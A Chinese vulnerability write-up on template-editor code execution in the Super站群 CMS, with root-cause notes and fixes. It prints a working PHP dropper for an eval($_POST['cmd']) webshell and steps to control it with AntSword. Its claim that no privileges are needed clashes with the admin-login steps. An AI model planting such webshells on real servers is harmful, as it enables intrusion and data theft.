SUPER站群命令执行之官方审核
字数 898 2025-08-11 22:57:16

Super站群系统文件上传漏洞分析与利用

漏洞概述

桂林思与云文化传媒有限公司开发的Super站群系统最新版本存在高危文件上传漏洞,攻击者可通过后台模板编辑功能写入恶意PHP代码,进而获取服务器控制权限。

漏洞影响

  • 影响版本:Super站群系统最新版本(具体版本号未提及)
  • 影响范围:所有使用受影响版本的用户
  • 危害等级:高危(可直接获取服务器控制权)

漏洞复现步骤

1. 环境搭建

  1. 从官网(https://www.cmssuper.com/)下载Super站群系统
    • 注意:谷歌浏览器可能因Mixed Content问题无法直接下载,需通过调试模式或改用360/IE浏览器
  2. 安装系统并登录后台(http://sup.com/admin/#/home)

2. 漏洞利用过程

  1. 进入后台后,导航至:系统设置 → 模板风格
  2. 下载任意模板(如有需要)
  3. 选择目标模板,点击"编辑模板"
  4. 在模板编辑器中插入以下恶意代码:
<?php 
$file=fopen("muma.php","w"); // 在根目录创建muma.php文件
fwrite($file,'<'); 
fwrite($file,'?'); 
fwrite($file,'php'); 
fwrite($file,' @eval($_POST["cmd"]);'); 
fwrite($file,'?>'); 
?>
  1. 点击保存模板
  2. 访问前端页面触发模板解析执行

3. 后渗透利用

  1. 恶意代码执行后,系统将在网站根目录生成muma.php文件
  2. 使用中国蚁剑等WebShell管理工具连接木马:
    • 连接地址:http://目标域名/muma.php
    • 密码参数:cmd
  3. 成功连接后可获取:
    • 服务器完整控制权限
    • 网站源代码
    • 数据库配置信息

漏洞原理分析

  1. 模板编辑功能未对用户输入进行充分过滤
  2. 系统使用stripslashes函数对内容进行反斜杠处理,但未对PHP代码执行等危险操作进行限制
  3. 模板解析机制允许直接执行PHP代码
  4. 文件写入操作未做安全限制,导致可任意写入WebShell

修复建议

  1. 临时解决方案:

    • 禁用或限制模板编辑功能
    • 监控网站目录下的文件变更,特别是.php文件的创建
    • 删除已存在的恶意文件(muma.php等)
  2. 长期解决方案:

    • 对模板内容进行严格过滤,禁止PHP代码执行
    • 实现文件写入的白名单机制
    • 更新到官方修复后的版本

总结

该漏洞利用简单但危害极大,攻击者无需特殊权限即可通过后台模板编辑功能获取服务器控制权。建议所有Super站群系统用户立即检查系统安全性,并按照上述建议进行防护。

Super站群系统文件上传漏洞分析与利用 漏洞概述 桂林思与云文化传媒有限公司开发的Super站群系统最新版本存在高危文件上传漏洞,攻击者可通过后台模板编辑功能写入恶意PHP代码,进而获取服务器控制权限。 漏洞影响 影响版本:Super站群系统最新版本(具体版本号未提及) 影响范围:所有使用受影响版本的用户 危害等级:高危(可直接获取服务器控制权) 漏洞复现步骤 1. 环境搭建 从官网(https://www.cmssuper.com/)下载Super站群系统 注意:谷歌浏览器可能因Mixed Content问题无法直接下载,需通过调试模式或改用360/IE浏览器 安装系统并登录后台(http://sup.com/admin/#/home) 2. 漏洞利用过程 进入后台后,导航至:系统设置 → 模板风格 下载任意模板(如有需要) 选择目标模板,点击"编辑模板" 在模板编辑器中插入以下恶意代码: 点击保存模板 访问前端页面触发模板解析执行 3. 后渗透利用 恶意代码执行后,系统将在网站根目录生成 muma.php 文件 使用中国蚁剑等WebShell管理工具连接木马: 连接地址: http://目标域名/muma.php 密码参数: cmd 成功连接后可获取: 服务器完整控制权限 网站源代码 数据库配置信息 漏洞原理分析 模板编辑功能未对用户输入进行充分过滤 系统使用 stripslashes 函数对内容进行反斜杠处理,但未对PHP代码执行等危险操作进行限制 模板解析机制允许直接执行PHP代码 文件写入操作未做安全限制,导致可任意写入WebShell 修复建议 临时解决方案: 禁用或限制模板编辑功能 监控网站目录下的文件变更,特别是.php文件的创建 删除已存在的恶意文件(muma.php等) 长期解决方案: 对模板内容进行严格过滤,禁止PHP代码执行 实现文件写入的白名单机制 更新到官方修复后的版本 总结 该漏洞利用简单但危害极大,攻击者无需特殊权限即可通过后台模板编辑功能获取服务器控制权。建议所有Super站群系统用户立即检查系统安全性,并按照上述建议进行防护。